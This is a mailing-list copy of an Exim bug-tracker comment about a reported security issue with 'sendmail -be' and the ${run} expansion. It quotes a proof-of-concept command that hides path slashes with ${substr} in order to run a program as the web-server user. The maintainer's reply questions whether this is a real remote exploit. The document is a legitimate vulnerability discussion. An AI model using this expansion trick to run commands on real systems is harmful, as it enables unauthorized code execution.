[exim-dev] [Bug 2118] sendmail -be and ${run} macro security…

トップ ページ
このメッセージを削除
このメッセージに返信
著者: admin
日付:  
To: exim-dev
題目: [exim-dev] [Bug 2118] sendmail -be and ${run} macro security problem
https://bugs.exim.org/show_bug.cgi?id=2118

Heiko Schlittermann <hs@???> changed:

           What    |Removed                     |Added
----------------------------------------------------------------------------
                 CC|                            |hs@???


--- Comment #4 from Heiko Schlittermann <hs@???> ---
(In reply to Sandor Takacs from comment #2)
> If you run this as www-data you can create a remote shell to the attacked
> site as the linked PoC says. I tried it im my FreeBSD box:
>
> [root@??? ~]# ls -l /tmp/test
> ls: /tmp/test: No such file or directory
> [root@??? ~]# sudo -u www sendmail -be
> '${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}b
> in${substr{0}{1}{$spool_directory}}touch
> ${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}test}}'
>
> [root@??? ~]# ls -l /tmp/test
> -rw------- 1 www wheel 0 May 5 19:42 /tmp/test
> [root@??? ~]#


(1) Why is this a remote exploit? For my understanding you're running
    your exploit directly on the target machine, don't you?


(2) What is the difference to "sudo -u www touch /tmp/test"?
    If your sudo configuration doesn't allow you to run "touch", but allows 
    you to run "sendmail" with arbitrary options, then I'd see this as
    a problem of your sudo configuration, not a problem of Exim. But I
    may miss the point…



--
Heiko

--
You are receiving this mail because:
You are on the CC list for the bug.